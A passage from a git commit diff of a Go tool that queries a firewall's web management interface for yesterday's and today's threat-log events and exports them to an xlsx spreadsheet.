优化防火墙接口数据读取到xlsx文件中
This commit is contained in:
李超
parent
30cc9fe3e5
commit
2d85afc333
@ -1,155 +0,0 @@
|
|||||||
package attackevent
|
|
||||||
|
|
||||||
import (
|
|
||||||
"bytes"
|
|
||||||
"dt_automate/conn"
|
|
||||||
"dt_automate/tool"
|
|
||||||
"log"
|
|
||||||
"math"
|
|
||||||
"net/url"
|
|
||||||
"strconv"
|
|
||||||
"time"
|
|
||||||
|
|
||||||
"github.com/Esword618/unioffice/schema/soo/sml"
|
|
||||||
"github.com/Esword618/unioffice/spreadsheet"
|
|
||||||
)
|
|
||||||
|
|
||||||
// var cookieStr string
|
|
||||||
|
|
||||||
// var Counts int //存储总条数
|
|
||||||
// var err error
|
|
||||||
|
|
||||||
// 传入cookie
|
|
||||||
func Fw_event(cookieStr string) {
|
|
||||||
ss := spreadsheet.New()
|
|
||||||
sheet := ss.AddSheet()
|
|
||||||
// sheet.SetFrozen(true, false)
|
|
||||||
v := sheet.InitialView()
|
|
||||||
v.SetState(sml.ST_PaneStateFrozen)
|
|
||||||
v.SetXSplit(0) //冻结列
|
|
||||||
v.SetYSplit(1) //冻结行
|
|
||||||
// v.SetTopLeft("B2")
|
|
||||||
// // 获取第一个工作表
|
|
||||||
// sheet, err := ss.GetSheet("Sheet2")
|
|
||||||
// if err != nil {
|
|
||||||
// log.Println(err)
|
|
||||||
// }
|
|
||||||
sheet.Cell("A1").SetString("序号")
|
|
||||||
sheet.Cell("B1").SetString("攻击时间")
|
|
||||||
sheet.Cell("C1").SetString("源安全域")
|
|
||||||
sheet.Cell("D1").SetString("目的安全域")
|
|
||||||
sheet.Cell("E1").SetString("源IP")
|
|
||||||
sheet.Cell("F1").SetString("目的IP")
|
|
||||||
sheet.Cell("G1").SetString("目的端口")
|
|
||||||
sheet.Cell("H1").SetString("威胁名称")
|
|
||||||
sheet.Cell("I1").SetString("攻击类别")
|
|
||||||
sheet.Cell("J1").SetString("攻击子类别")
|
|
||||||
sheet.Cell("K1").SetString("应用协议")
|
|
||||||
sheet.Cell("L1").SetString("域名(host)")
|
|
||||||
|
|
||||||
//当前时间
|
|
||||||
EndTime := time.Unix(tool.Timestamp("second"), 0).Format("2006-01-02T15:04:05")
|
|
||||||
//今天0点
|
|
||||||
StartTime := time.Date(time.Now().Year(), time.Now().Month(), time.Now().Day(), 0, 0, 0, 0, time.Now().Location()).Format("2006-01-02T15:04:05")
|
|
||||||
//昨天23点59分59秒
|
|
||||||
EndTime_1 := time.Date(time.Now().Year(), time.Now().Month(), time.Now().Day(), 0, 0, 0, 0, time.Now().Location()).Add(-1 * time.Second).Format("2006-01-02T15:04:05")
|
|
||||||
StartTime_1 := time.Date(time.Now().Year(), time.Now().Month(), time.Now().Day(), 0, 0, 0, 0, time.Now().Location()).Add(-8 * time.Hour).Format("2006-01-02T15:04:05")
|
|
||||||
// log.Println(EndTime_1)
|
|
||||||
// log.Println(StartTime_1)
|
|
||||||
// 构建 x-www-form-urlencoded 格式的请求体
|
|
||||||
//今天0点到现在的攻击事件
|
|
||||||
values := url.Values{}
|
|
||||||
values.Add("xml", "<rpc message-id='101' xmlns='urn:ietf:params:xml:ns:netconf:base:1.0' xmlns:web='urn:ietf:params:xml:ns:netconf:base:1.0'><get-bulk><filter type='subtree'><top xmlns='http://www.unis.cn/netconf/data:1.0' xmlns:web='http://www.unis.cn/netconf/base:1.0' xmlns:data='http://www.unis.cn/netconf/data:1.0'><NTOP><LogPaging><Log><LogType>1</LogType><UserID/><ID/><TimeFilter><StartTime>"+StartTime+"</StartTime><EndTime>"+EndTime+"</EndTime></TimeFilter><PageNo>1</PageNo><CountPerPage>200</CountPerPage><TotalCounts/><InputJSON>{"SrcZoneName":"Untrust","DestZoneName":"Trust"}</InputJSON><OutputJSON/></Log></LogPaging></NTOP></top></filter></get-bulk></rpc>")
|
|
||||||
values.Add("req_menu", "M_Monitor/M_AtkLog/M_ThreatLog")
|
|
||||||
//昨天下午16点到晚上23点59分59秒的攻击事件
|
|
||||||
values_1 := url.Values{}
|
|
||||||
values_1.Add("xml", "<rpc message-id='101' xmlns='urn:ietf:params:xml:ns:netconf:base:1.0' xmlns:web='urn:ietf:params:xml:ns:netconf:base:1.0'><get-bulk><filter type='subtree'><top xmlns='http://www.unis.cn/netconf/data:1.0' xmlns:web='http://www.unis.cn/netconf/base:1.0' xmlns:data='http://www.unis.cn/netconf/data:1.0'><NTOP><LogPaging><Log><LogType>1</LogType><UserID/><ID/><TimeFilter><StartTime>"+StartTime_1+"</StartTime><EndTime>"+EndTime_1+"</EndTime></TimeFilter><PageNo>1</PageNo><CountPerPage>200</CountPerPage><TotalCounts/><InputJSON>{"SrcZoneName":"Untrust","DestZoneName":"Trust"}</InputJSON><OutputJSON/></Log></LogPaging></NTOP></top></filter></get-bulk></rpc>")
|
|
||||||
values_1.Add("req_menu", "M_Monitor/M_AtkLog/M_ThreatLog")
|
|
||||||
header := map[string]string{
|
|
||||||
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
|
|
||||||
"referer": "https://11.2.68.146/wnm/frame/index.php",
|
|
||||||
"cookie": cookieStr,
|
|
||||||
}
|
|
||||||
//先查询昨天的事件
|
|
||||||
body := conn.DT_POST("https://11.2.68.146/wnm/get.j", header, bytes.NewBufferString(values_1.Encode()))
|
|
||||||
// log.Println(string(body))
|
|
||||||
log.Println(body)
|
|
||||||
var Con int //插入总数
|
|
||||||
//存储昨日攻击事件
|
|
||||||
if body.LogPaging[0].TotalCounts > "200" {
|
|
||||||
a, err := strconv.ParseFloat(body.LogPaging[0].TotalCounts, 64)
|
|
||||||
if err != nil {
|
|
||||||
log.Println(err)
|
|
||||||
}
|
|
||||||
log.Println("昨日查询到总条数:", a)
|
|
||||||
totalPages := int(math.Floor(float64(a))/float64(200) + 1)
|
|
||||||
log.Println(totalPages)
|
|
||||||
for i := 1; i < totalPages+1; i++ {
|
|
||||||
// values_1 := url.Values{}
|
|
||||||
// values_1.Add("xml", "<rpc message-id='101' xmlns='urn:ietf:params:xml:ns:netconf:base:1.0' xmlns:web='urn:ietf:params:xml:ns:netconf:base:1.0'><get-bulk><filter type='subtree'><top xmlns='http://www.unis.cn/netconf/data:1.0' xmlns:web='http://www.unis.cn/netconf/base:1.0' xmlns:data='http://www.unis.cn/netconf/data:1.0'><NTOP><LogPaging><Log><LogType>1</LogType><UserID/><ID/><TimeFilter><StartTime>"+StartTime_1+"</StartTime><EndTime>"+EndTime_1+"</EndTime></TimeFilter><PageNo>"+strconv.Itoa(i)+"</PageNo><CountPerPage>200</CountPerPage><TotalCounts/><InputJSON>{"SrcZoneName":"Untrust","DestZoneName":"Trust"}</InputJSON><OutputJSON/></Log></LogPaging></NTOP></top></filter></get-bulk></rpc>")
|
|
||||||
// values_1.Add("req_menu", "M_Monitor/M_AtkLog/M_ThreatLog")
|
|
||||||
body := conn.DT_POST("https://11.2.68.146/wnm/get.j", header, bytes.NewBufferString(values_1.Encode()))
|
|
||||||
log.Println(values_1, i)
|
|
||||||
for v, k := range body.LogPaging {
|
|
||||||
Con = v + 2
|
|
||||||
sheet.Cell("A" + strconv.Itoa(Con)).SetString(strconv.Itoa(Con)) // 第一列 (A1)
|
|
||||||
sheet.Cell("B" + strconv.Itoa(Con)).SetString(k.OutputJSON.Time)
|
|
||||||
sheet.Cell("C" + strconv.Itoa(Con)).SetString(k.OutputJSON.SrcZoneName)
|
|
||||||
sheet.Cell("D" + strconv.Itoa(Con)).SetString(k.OutputJSON.DestZoneName)
|
|
||||||
sheet.Cell("E" + strconv.Itoa(Con)).SetString(k.OutputJSON.SrcIPAddr)
|
|
||||||
sheet.Cell("F" + strconv.Itoa(Con)).SetString(k.OutputJSON.DestIPAddr)
|
|
||||||
sheet.Cell("G" + strconv.Itoa(Con)).SetString(k.OutputJSON.DestPort)
|
|
||||||
sheet.Cell("H" + strconv.Itoa(Con)).SetString(k.OutputJSON.ThreatName)
|
|
||||||
sheet.Cell("I" + strconv.Itoa(Con)).SetString(k.OutputJSON.MethodNameCN)
|
|
||||||
sheet.Cell("J" + strconv.Itoa(Con)).SetString(k.OutputJSON.MethodSubNameCN)
|
|
||||||
sheet.Cell("K" + strconv.Itoa(Con)).SetString(k.OutputJSON.Application)
|
|
||||||
sheet.Cell("L" + strconv.Itoa(Con)).SetString(k.OutputJSON.HttpHost)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
}
|
|
||||||
Con = Con + 1
|
|
||||||
//存储今日攻击事件
|
|
||||||
body_1 := conn.DT_POST("https://11.2.68.146/wnm/get.j", header, bytes.NewBufferString(values_1.Encode()))
|
|
||||||
if body_1.LogPaging[0].TotalCounts > "200" {
|
|
||||||
a, err := strconv.ParseFloat(body_1.LogPaging[0].TotalCounts, 64)
|
|
||||||
if err != nil {
|
|
||||||
log.Println(err)
|
|
||||||
}
|
|
||||||
log.Println("今日查询到总条数:", a)
|
|
||||||
totalPages := int(math.Floor(float64(a))/float64(200) + 1)
|
|
||||||
log.Println(totalPages)
|
|
||||||
for i := 1; i < totalPages+1; i++ {
|
|
||||||
// values_1 := url.Values{}
|
|
||||||
// values_1.Add("xml", "<rpc message-id='101' xmlns='urn:ietf:params:xml:ns:netconf:base:1.0' xmlns:web='urn:ietf:params:xml:ns:netconf:base:1.0'><get-bulk><filter type='subtree'><top xmlns='http://www.unis.cn/netconf/data:1.0' xmlns:web='http://www.unis.cn/netconf/base:1.0' xmlns:data='http://www.unis.cn/netconf/data:1.0'><NTOP><LogPaging><Log><LogType>1</LogType><UserID/><ID/><TimeFilter><StartTime>"+StartTime+"</StartTime><EndTime>"+EndTime+"</EndTime></TimeFilter><PageNo>"+strconv.Itoa(i)+"</PageNo><CountPerPage>200</CountPerPage><TotalCounts/><InputJSON>{"SrcZoneName":"Untrust","DestZoneName":"Trust"}</InputJSON><OutputJSON/></Log></LogPaging></NTOP></top></filter></get-bulk></rpc>")
|
|
||||||
// values_1.Add("req_menu", "M_Monitor/M_AtkLog/M_ThreatLog")
|
|
||||||
body_1 := conn.DT_POST("https://11.2.68.146/wnm/get.j", header, bytes.NewBufferString(values.Encode()))
|
|
||||||
log.Println(values_1, i)
|
|
||||||
for v, k := range body_1.LogPaging {
|
|
||||||
Con = v + Con
|
|
||||||
sheet.Cell("A" + strconv.Itoa(Con)).SetString(strconv.Itoa(Con)) // 第一列 (A1)
|
|
||||||
sheet.Cell("B" + strconv.Itoa(Con)).SetString(k.OutputJSON.Time)
|
|
||||||
sheet.Cell("C" + strconv.Itoa(Con)).SetString(k.OutputJSON.SrcZoneName)
|
|
||||||
sheet.Cell("D" + strconv.Itoa(Con)).SetString(k.OutputJSON.DestZoneName)
|
|
||||||
sheet.Cell("E" + strconv.Itoa(Con)).SetString(k.OutputJSON.SrcIPAddr)
|
|
||||||
sheet.Cell("F" + strconv.Itoa(Con)).SetString(k.OutputJSON.DestIPAddr)
|
|
||||||
sheet.Cell("G" + strconv.Itoa(Con)).SetString(k.OutputJSON.DestPort)
|
|
||||||
sheet.Cell("H" + strconv.Itoa(Con)).SetString(k.OutputJSON.ThreatName)
|
|
||||||
sheet.Cell("I" + strconv.Itoa(Con)).SetString(k.OutputJSON.MethodNameCN)
|
|
||||||
sheet.Cell("J" + strconv.Itoa(Con)).SetString(k.OutputJSON.MethodSubNameCN)
|
|
||||||
sheet.Cell("K" + strconv.Itoa(Con)).SetString(k.OutputJSON.Application)
|
|
||||||
sheet.Cell("L" + strconv.Itoa(Con)).SetString(k.OutputJSON.HttpHost)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// 保存修改后的 Excel 文件
|
|
||||||
|
|
||||||
if err := ss.Validate(); err != nil {
|
|
||||||
log.Fatalf("验证文件时出错: %s", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
if err := ss.SaveToFile("防火墙安全事件.xlsx"); err != nil {
|
|
||||||
log.Fatalf("保存文件时出错: %s", err)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
309
attackevent/fw_data.go
Normal file
309
attackevent/fw_data.go
Normal file
@ -0,0 +1,309 @@
|
|||||||
|
package attackevent
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"dt_automate/conn"
|
||||||
|
"dt_automate/tool"
|
||||||
|
"encoding/json"
|
||||||
|
"log"
|
||||||
|
"math"
|
||||||
|
"net/url"
|
||||||
|
"strconv"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/Esword618/unioffice/schema/soo/sml"
|
||||||
|
"github.com/Esword618/unioffice/spreadsheet"
|
||||||
|
)
|
||||||
|
|
||||||
|
// var cookieStr string
|
||||||
|
|
||||||
|
// var Counts int //存储总条数
|
||||||
|
// var err error
|
||||||
|
|
||||||
|
// 传入cookie
|
||||||
|
func Fw_event(cookieStr string) {
|
||||||
|
ss := spreadsheet.New()
|
||||||
|
sheet := ss.AddSheet()
|
||||||
|
// sheet.SetFrozen(true, false)
|
||||||
|
v := sheet.InitialView()
|
||||||
|
v.SetState(sml.ST_PaneStateFrozen)
|
||||||
|
v.SetXSplit(0) //冻结列
|
||||||
|
v.SetYSplit(1) //冻结行
|
||||||
|
|
||||||
|
// v.SetTopLeft("B2")
|
||||||
|
// // 获取第一个工作表
|
||||||
|
// sheet, err := ss.GetSheet("Sheet2")
|
||||||
|
// if err != nil {
|
||||||
|
// log.Println(err)
|
||||||
|
// }
|
||||||
|
sheet.Cell("A1").SetString("序号")
|
||||||
|
sheet.Cell("B1").SetString("攻击时间")
|
||||||
|
sheet.Cell("C1").SetString("源安全域")
|
||||||
|
sheet.Cell("D1").SetString("目的安全域")
|
||||||
|
sheet.Cell("E1").SetString("源IP")
|
||||||
|
sheet.Cell("F1").SetString("目的IP")
|
||||||
|
sheet.Cell("G1").SetString("目的端口")
|
||||||
|
sheet.Cell("H1").SetString("威胁名称")
|
||||||
|
sheet.Cell("I1").SetString("攻击类别")
|
||||||
|
sheet.Cell("J1").SetString("攻击子类别")
|
||||||
|
sheet.Cell("K1").SetString("应用协议")
|
||||||
|
sheet.Cell("L1").SetString("CVE")
|
||||||
|
sheet.Cell("M1").SetString("域名(host)")
|
||||||
|
sheet.Cell("N1").SetString("请求路径")
|
||||||
|
sheet.Cell("O1").SetString("参数")
|
||||||
|
log.Println("生成表格表头标题")
|
||||||
|
//当前时间
|
||||||
|
EndTime := time.Unix(tool.Timestamp("second"), 0).Format("2006-01-02T15:04:05")
|
||||||
|
//今天0点
|
||||||
|
StartTime := time.Date(time.Now().Year(), time.Now().Month(), time.Now().Day(), 0, 0, 0, 0, time.Now().Location()).Format("2006-01-02T15:04:05")
|
||||||
|
//昨天23点59分59秒
|
||||||
|
EndTime_1 := time.Date(time.Now().Year(), time.Now().Month(), time.Now().Day(), 0, 0, 0, 0, time.Now().Location()).Add(-1 * time.Second).Format("2006-01-02T15:04:05")
|
||||||
|
StartTime_1 := time.Date(time.Now().Year(), time.Now().Month(), time.Now().Day(), 0, 0, 0, 0, time.Now().Location()).Add(-8 * time.Hour).Format("2006-01-02T15:04:05")
|
||||||
|
// log.Println(EndTime_1)
|
||||||
|
// log.Println(StartTime_1)
|
||||||
|
// 构建 x-www-form-urlencoded 格式的请求体
|
||||||
|
//今天0点到现在的攻击事件
|
||||||
|
values := url.Values{}
|
||||||
|
values.Add("xml", "<rpc message-id='101' xmlns='urn:ietf:params:xml:ns:netconf:base:1.0' xmlns:web='urn:ietf:params:xml:ns:netconf:base:1.0'><get-bulk><filter type='subtree'><top xmlns='http://www.unis.cn/netconf/data:1.0' xmlns:web='http://www.unis.cn/netconf/base:1.0' xmlns:data='http://www.unis.cn/netconf/data:1.0'><NTOP><LogPaging><Log><LogType>1</LogType><UserID/><ID/><TimeFilter><StartTime>"+StartTime+"</StartTime><EndTime>"+EndTime+"</EndTime></TimeFilter><PageNo>1</PageNo><CountPerPage>200</CountPerPage><TotalCounts/><InputJSON>{"SrcZoneName":"Untrust","DestZoneName":"Trust"}</InputJSON><OutputJSON/></Log></LogPaging></NTOP></top></filter></get-bulk></rpc>")
|
||||||
|
values.Add("req_menu", "M_Monitor/M_AtkLog/M_ThreatLog")
|
||||||
|
//昨天下午16点到晚上23点59分59秒的攻击事件
|
||||||
|
values_1 := url.Values{}
|
||||||
|
values_1.Add("xml", "<rpc message-id='101' xmlns='urn:ietf:params:xml:ns:netconf:base:1.0' xmlns:web='urn:ietf:params:xml:ns:netconf:base:1.0'><get-bulk><filter type='subtree'><top xmlns='http://www.unis.cn/netconf/data:1.0' xmlns:web='http://www.unis.cn/netconf/base:1.0' xmlns:data='http://www.unis.cn/netconf/data:1.0'><NTOP><LogPaging><Log><LogType>1</LogType><UserID/><ID/><TimeFilter><StartTime>"+StartTime_1+"</StartTime><EndTime>"+EndTime_1+"</EndTime></TimeFilter><PageNo>1</PageNo><CountPerPage>200</CountPerPage><TotalCounts/><InputJSON>{"SrcZoneName":"Untrust","DestZoneName":"Trust"}</InputJSON><OutputJSON/></Log></LogPaging></NTOP></top></filter></get-bulk></rpc>")
|
||||||
|
values_1.Add("req_menu", "M_Monitor/M_AtkLog/M_ThreatLog")
|
||||||
|
header := map[string]string{
|
||||||
|
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
|
||||||
|
"referer": "https://11.2.68.146/wnm/frame/index.php",
|
||||||
|
"cookie": cookieStr,
|
||||||
|
}
|
||||||
|
//先查询昨天的事件
|
||||||
|
yesterday := conn.DT_POST("https://11.2.68.146/wnm/get.j", header, bytes.NewBufferString(values_1.Encode()))
|
||||||
|
// log.Println(string(body))
|
||||||
|
// log.Println(yesterday)
|
||||||
|
|
||||||
|
var Con int //插入总数
|
||||||
|
//存储昨日攻击事件
|
||||||
|
num, _ := strconv.Atoi(Date_v(yesterday).NTOP.LogPaging[0].TotalCounts)
|
||||||
|
if num > 200 {
|
||||||
|
a, err := strconv.ParseFloat(Date_v(yesterday).NTOP.LogPaging[0].TotalCounts, 64)
|
||||||
|
if err != nil {
|
||||||
|
log.Println(err)
|
||||||
|
}
|
||||||
|
log.Println("昨日查询到总条数:", a)
|
||||||
|
totalPages := int(math.Floor(float64(a))/float64(200) + 1)
|
||||||
|
log.Println(totalPages)
|
||||||
|
for i := 1; i < totalPages+1; i++ {
|
||||||
|
values_1 := url.Values{}
|
||||||
|
values_1.Add("xml", "<rpc message-id='101' xmlns='urn:ietf:params:xml:ns:netconf:base:1.0' xmlns:web='urn:ietf:params:xml:ns:netconf:base:1.0'><get-bulk><filter type='subtree'><top xmlns='http://www.unis.cn/netconf/data:1.0' xmlns:web='http://www.unis.cn/netconf/base:1.0' xmlns:data='http://www.unis.cn/netconf/data:1.0'><NTOP><LogPaging><Log><LogType>1</LogType><UserID/><ID/><TimeFilter><StartTime>"+StartTime_1+"</StartTime><EndTime>"+EndTime_1+"</EndTime></TimeFilter><PageNo>"+strconv.Itoa(i)+"</PageNo><CountPerPage>200</CountPerPage><TotalCounts/><InputJSON>{"SrcZoneName":"Untrust","DestZoneName":"Trust"}</InputJSON><OutputJSON/></Log></LogPaging></NTOP></top></filter></get-bulk></rpc>")
|
||||||
|
values_1.Add("req_menu", "M_Monitor/M_AtkLog/M_ThreatLog")
|
||||||
|
yesterday := conn.DT_POST("https://11.2.68.146/wnm/get.j", header, bytes.NewBufferString(values_1.Encode()))
|
||||||
|
log.Println(values_1, i)
|
||||||
|
for v, k := range Date_v(yesterday).NTOP.LogPaging {
|
||||||
|
Con = v + 2
|
||||||
|
sheet.Cell("A" + strconv.Itoa(Con)).SetString(strconv.Itoa(Con)) // 第一列 (A1)
|
||||||
|
sheet.Cell("B" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["Time"].(string))
|
||||||
|
sheet.Cell("C" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["SrcZoneName"].(string))
|
||||||
|
sheet.Cell("D" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["DestZoneName"].(string))
|
||||||
|
sheet.Cell("E" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["SrcIPAddr"].(string))
|
||||||
|
sheet.Cell("F" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["DestIPAddr"].(string))
|
||||||
|
sheet.Cell("G" + strconv.Itoa(Con)).SetString(strconv.FormatFloat(k.OutputJSON.(map[string]interface{})["DestPort"].(float64), 'f', -1, 64))
|
||||||
|
sheet.Cell("H" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["ThreatName"].(string))
|
||||||
|
sheet.Cell("I" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["MethodNameCN"].(string))
|
||||||
|
sheet.Cell("J" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["MethodSubNameCN"].(string))
|
||||||
|
sheet.Cell("K" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["Application"].(string))
|
||||||
|
sheet.Cell("L" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["CVE"].(string))
|
||||||
|
sheet.Cell("M" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["HttpHost"].(string))
|
||||||
|
sheet.Cell("N" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["HttpFirstLine"].(string))
|
||||||
|
sheet.Cell("O" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["Payload"].(string))
|
||||||
|
log.Println("开始插入昨日数据:", Con, k.OutputJSON.(map[string]interface{})["SrcIPAddr"].(string))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
} else {
|
||||||
|
for v, k := range Date_v(yesterday).NTOP.LogPaging {
|
||||||
|
Con = v + 2
|
||||||
|
sheet.Cell("A" + strconv.Itoa(Con)).SetString(strconv.Itoa(Con)) // 第一列 (A1)
|
||||||
|
sheet.Cell("B" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["Time"].(string))
|
||||||
|
sheet.Cell("C" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["SrcZoneName"].(string))
|
||||||
|
sheet.Cell("D" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["DestZoneName"].(string))
|
||||||
|
sheet.Cell("E" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["SrcIPAddr"].(string))
|
||||||
|
sheet.Cell("F" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["DestIPAddr"].(string))
|
||||||
|
sheet.Cell("G" + strconv.Itoa(Con)).SetString(strconv.FormatFloat(k.OutputJSON.(map[string]interface{})["DestPort"].(float64), 'f', -1, 64))
|
||||||
|
sheet.Cell("H" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["ThreatName"].(string))
|
||||||
|
sheet.Cell("I" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["MethodNameCN"].(string))
|
||||||
|
sheet.Cell("J" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["MethodSubNameCN"].(string))
|
||||||
|
sheet.Cell("K" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["Application"].(string))
|
||||||
|
sheet.Cell("L" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["CVE"].(string))
|
||||||
|
sheet.Cell("M" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["HttpHost"].(string))
|
||||||
|
sheet.Cell("N" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["HttpFirstLine"].(string))
|
||||||
|
sheet.Cell("O" + strconv.Itoa(Con)).SetString(k.OutputJSON.(map[string]interface{})["Payload"].(string))
|
||||||
|
log.Println("开始插入昨日数据:", Con, k.OutputJSON.(map[string]interface{})["SrcIPAddr"].(string))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
Con = Con + 1
|
||||||
|
//存储今日攻击事件
|
||||||
|
today := conn.DT_POST("https://11.2.68.146/wnm/get.j", header, bytes.NewBufferString(values_1.Encode()))
|
||||||
|
num_1, _ := strconv.Atoi(Date_v(today).NTOP.LogPaging[0].TotalCounts)
|
||||||
|
if num_1 > 200 {
|
||||||
|
a, err := strconv.ParseFloat(Date_v(today).NTOP.LogPaging[0].TotalCounts, 64)
|
||||||
|
if err != nil {
|
||||||
|
log.Println(err)
|
||||||
|
}
|
||||||
|
log.Println("今日查询到总条数:", a)
|
||||||
|
totalPages := int(math.Floor(float64(a))/float64(200) + 1)
|
||||||
|
log.Println(totalPages)
|
||||||
|
for i := 1; i < totalPages+1; i++ {
|
||||||
|
values_1 := url.Values{}
|
||||||
|
values_1.Add("xml", "<rpc message-id='101' xmlns='urn:ietf:params:xml:ns:netconf:base:1.0' xmlns:web='urn:ietf:params:xml:ns:netconf:base:1.0'><get-bulk><filter type='subtree'><top xmlns='http://www.unis.cn/netconf/data:1.0' xmlns:web='http://www.unis.cn/netconf/base:1.0' xmlns:data='http://www.unis.cn/netconf/data:1.0'><NTOP><LogPaging><Log><LogType>1</LogType><UserID/><ID/><TimeFilter><StartTime>"+StartTime+"</StartTime><EndTime>"+EndTime+"</EndTime></TimeFilter><PageNo>"+strconv.Itoa(i)+"</PageNo><CountPerPage>200</CountPerPage><TotalCounts/><InputJSON>{"SrcZoneName":"Untrust","DestZoneName":"Trust"}</InputJSON><OutputJSON/></Log></LogPaging></NTOP></top></filter></get-bulk></rpc>")
|
||||||
|
values_1.Add("req_menu", "M_Monitor/M_AtkLog/M_ThreatLog")
|
||||||
|
today := conn.DT_POST("https://11.2.68.146/wnm/get.j", header, bytes.NewBufferString(values.Encode()))
|
||||||
|
log.Println(values_1, i)
|
||||||
|
for v, k := range Date_v(today).NTOP.LogPaging {
|
||||||
|
sheet.Cell("A" + strconv.Itoa(Con+v)).SetString(strconv.Itoa(Con)) // 第一列 (A1)
|
||||||
|
sheet.Cell("B" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["Time"].(string))
|
||||||
|
sheet.Cell("C" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["SrcZoneName"].(string))
|
||||||
|
sheet.Cell("D" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["DestZoneName"].(string))
|
||||||
|
sheet.Cell("E" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["SrcIPAddr"].(string))
|
||||||
|
sheet.Cell("F" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["DestIPAddr"].(string))
|
||||||
|
sheet.Cell("G" + strconv.Itoa(Con+v)).SetString(strconv.FormatFloat(k.OutputJSON.(map[string]interface{})["DestPort"].(float64), 'f', -1, 64))
|
||||||
|
sheet.Cell("H" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["ThreatName"].(string))
|
||||||
|
sheet.Cell("I" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["MethodNameCN"].(string))
|
||||||
|
sheet.Cell("J" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["MethodSubNameCN"].(string))
|
||||||
|
sheet.Cell("K" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["Application"].(string))
|
||||||
|
sheet.Cell("L" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["CVE"].(string))
|
||||||
|
sheet.Cell("M" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["HttpHost"].(string))
|
||||||
|
sheet.Cell("N" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["HttpFirstLine"].(string))
|
||||||
|
sheet.Cell("O" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["Payload"].(string))
|
||||||
|
log.Println("开始插入今日数据:", v+Con, k.OutputJSON.(map[string]interface{})["SrcIPAddr"].(string))
|
||||||
|
}
|
||||||
|
// log.Println(Date_v(JsonStr).NTOP.LogPaging)
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
for v, k := range Date_v(today).NTOP.LogPaging {
|
||||||
|
sheet.Cell("A" + strconv.Itoa(Con+v)).SetString(strconv.Itoa(Con)) // 第一列 (A1)
|
||||||
|
sheet.Cell("B" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["Time"].(string))
|
||||||
|
sheet.Cell("C" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["SrcZoneName"].(string))
|
||||||
|
sheet.Cell("D" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["DestZoneName"].(string))
|
||||||
|
sheet.Cell("E" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["SrcIPAddr"].(string))
|
||||||
|
sheet.Cell("F" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["DestIPAddr"].(string))
|
||||||
|
sheet.Cell("G" + strconv.Itoa(Con+v)).SetString(strconv.FormatFloat(k.OutputJSON.(map[string]interface{})["DestPort"].(float64), 'f', -1, 64))
|
||||||
|
sheet.Cell("H" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["ThreatName"].(string))
|
||||||
|
sheet.Cell("I" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["MethodNameCN"].(string))
|
||||||
|
sheet.Cell("J" + strconv.Itoa(Con+v)).SetString(k.OutputJSON.(map[string]interface{})["MethodSubNameCN"].(string))
|
||||||
|
